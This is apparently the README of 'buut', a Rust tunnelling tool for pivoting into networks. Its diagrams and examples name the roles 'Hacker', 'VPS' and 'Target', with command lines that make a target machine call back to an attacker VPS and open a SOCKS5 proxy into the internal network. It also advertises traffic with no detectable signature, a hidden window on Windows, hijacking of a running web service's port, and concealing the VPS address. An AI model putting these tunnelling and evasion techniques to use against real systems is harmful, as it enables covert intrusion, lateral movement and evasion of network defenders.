BUUT

https://github.com/YDHCUI/buut

介绍

一款使用rust开发的高性能正反向隧道代理工具，基于yamux多路复用技术。

工作原理

+------+      +--------------+      +-----+      +-----------+      +------------+      +----------+      +------+
|Hacker| <--> | Socks5 stream| <--> | VPS | <--> |Yamux frame| <--> |Noise stream| <--> |TCP stream| <--> |Target|
+------+      +--------------+      +-----+      +-----------+      +------------+      +----------+      +------+

参数介绍

    opts.optopt("k", "key",             "", "加密密钥");
    opts.optopt("l", "listen_addr",     "", "监听地址");
    opts.optopt("s", "remote_addr",     "", "远程地址");
    opts.optopt("f", "forward_addr",    "", "转发地址,只支持正向");
    opts.optopt("p", "proxy_port",      "", "代理端口,默认10086 或者端口映射模式,本地端口:目标端口,如80:81");
    opts.optopt("m", "transport",       "", "协议类型,默认TCP,支持<TCP|KCP>");
    opts.optopt("c", "config",          "", "配置文件");
    opts.optopt("n", "name",            "", "客户端id");
    opts.optopt("", "channel",          "", "通道数量,默认1");
    opts.optopt("", "headers",          "", "连接配置,连接服务所需的一些其它配置如cookie之类的");
    opts.optopt("", "sockspass",        "", "代理密码,默认buut/buut");
    opts.optopt("", "noiseparams",      "", "加密方式,noise默认Noise_KK_25519_ChaChaPoly_BLAKE2s");
    opts.optopt("", "srcip",            "", "来源IP,端口复用时使用");
    opts.optflagopt("F", "forward",     "", "是否正向模式");
    opts.optflagopt("S", "service",     "", "是否服务模式");
    opts.optflagopt("X", "soreuse",     "", "是否端口复用");
    opts.optflagopt("O", "origins",     "", "是否流量加密");
    opts.optflagopt("Z", "compres",     "", "是否流量压缩"); 
    opts.optflagopt("H", "hidecmd",     "", "是否隐藏窗口,仅windows");

特点：

速度快，使用多路复用技术 rust开发，速度、稳定性和安全性都有保证。

体积小，编译打包后只有不到几百k, 相比golang写的程序动辄10多M还是很有优势的。

无特征，程序使用Noise定制加密，可使用动态密钥保证无任何特征。

单文件，客户端和服务端使用同样的单文件、多模式自由组合切换。

多协议，目前已支持tcp、kcp，后续把icmp、dns协议支持加进去。

使用方法

反向隧道

默认使用tcp连接反向隧道

    vps执行：          ./buut -l 443 
    target执行：       ./buut -s vps:443
    hacker连接socks5   vps:10086 


    vps:
    [root@localhost]# ./buut -l 443
    Reverse Server Listen [tcp://0.0.0.0:443]
    Client Handshake From 127.0.0.1:29505
    Agent ID [rmSyYaLX] Proxy Listen [0.0.0.0:10086]

    target:
    [root@localhost]# ./buut -s 127.0.0.1:443
    Reverse Agent ID [rmSyYaLX] Channel [1] Connect Suss

使用-S 参数启用服务模式，会同时监听tcp和kcp端口

    vps执行：          ./buut -S -l 443 
    target执行：       ./buut -s vps:443
    hacker连接socks5   vps:10086 

正向隧道

使用-F 参数连接tcp正向隧道

    target执行：       ./buut -F -l 443 
    vps执行：          ./buut -F -s target:443 
    hacker连接socks5   vps:10086 

    target:
    [root@localhost]# ./buut -F -l 443
    Forward Agent ID [3Yj2LLAg] Listen On [tcp://0.0.0.0:443]

    vps:
    [root@localhost]# ./buut -F -s 127.0.0.1:443
    Forward Server [tcp://127.0.0.1:443] Connect Suss
    Agent ID [3Yj2LLAg] Proxy Listen [0.0.0.0:10086]

如果服务需要登录才能访问 则使用headers参数设置cookie等请求头。

    target执行：       ./buut -F -l 1234
    vps执行：          ./buut -F -s https://target:1234/xx --headers Cookie:Session=xxxxxx;
    hacker连接socks5   vps:10086 

自建代理

    vps执行：          ./buut -F -S -l 10086
    user连接socks5     vps:10086 

    vps:
    [root@localhost]# ./buut -S -F -l 10086
    Socks5 Server ID [FPamyVyY] Listen On [tcp://0.0.0.0:10086]

端口映射

    vps执行：          ./buut -l 443
    target执行         ./buut -s vps:443 -p 81:80  

    vps:
    [root@localhost]# ./buut -l 443
    Reverse Server Listen [tcp://0.0.0.0:443]
    Agent ID [rmSyYaLX] Port Mapping On [0.0.0.0:81 <-> 192.168.1.21:80]

    target:
    [root@localhost]# ./buut -s 127.0.0.1:443 -p 81:80 
    Reverse Agent ID [rmSyYaLX] Channel [1] Connect Suss

端口复用

1、假设现在有一个web服务运行在8080端口，正常情况下直接监听8080是会报如下错误

    buut.exe -F -l 8080
    通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 (os error 10048)

2、现在使用 -X 参数设置SO_REUSEADDR则可以成功监听

    buut.exe -X -F -l 8080
    Agent Forward ID [SCrLfzxa] Listen On [tcp://0.0.0.0:8080]

3、使用SO_REUSEADDR能成功的前提是原服务也启用了SO_REUSEADDR。如果原服务没有启用SO_REUSEADDR则不能成功。这时候可以使用 --srcip参数设置源IP 通过转发来实现端口复用。

    [root@localhost buut]# ./buut -X -F -l 32001
    Address already in use (os error 98)

    [root@localhost buut]# ./buut -X -F -l 32001 --srcip 192.168.2.122
    Rule src:192.168.2.122 port:32001 redirect:32002 applied Succ!
    Agent Forward ID [EJ1TROJd] Listen On [tcp://0.0.0.0:32002]
    Rule src:192.168.2.122 port:32001 redirect:32002 Delete Succ!

4、客户端正常连接web端口就行

    [root@localhost buut]# ./buut -F -s 123.151.152.153:32001
    GET / HTTP/1.1
    Upgrade: websocket
    Origin: http://123.151.152.153:32001/
    Sec-WebSocket-Version: 13
    Connection: Upgrade
    Sec-WebSocket-Key: ogq+DC9z2RVSsf86PpMizw==
    Host: 123.151.152.153:32001


    HTTP/1.1 101 Switching Protocols
    Sec-Websocket-Accept: o99zKAbgLJAkj09CtFiz7MMFpVU=
    Upgrade: websocket
    Connection: upgrade


    Server forward [tcp://123.151.152.153:32001] Connect Suss
    Client [123.151.152.153:32001]-[172.16.16.12] Join [D212ts4C]
    Agent ID [D212ts4C] Proxy Listen On [socks5://buut:[email protected]:10086]

Tips

1、设置BUUT变量隐藏vps。 如： 原本的 ./buut -s vps:1234 可改成 export BUUT=vps:1234 && ./buut -s 1

2、buut默认启用密码校验，默认用户名密码buut:buut 。

3、如果需要修改sockspass则需要为每个agent端单独设置，如 ./buut -s 127.0.0.1:443 --sockspass 123456

4、 使用带log的版本进行调试。 ./buut -l 1234 --log info

5、 目前只支持对tcp做端口复用

交流

加V拉你进群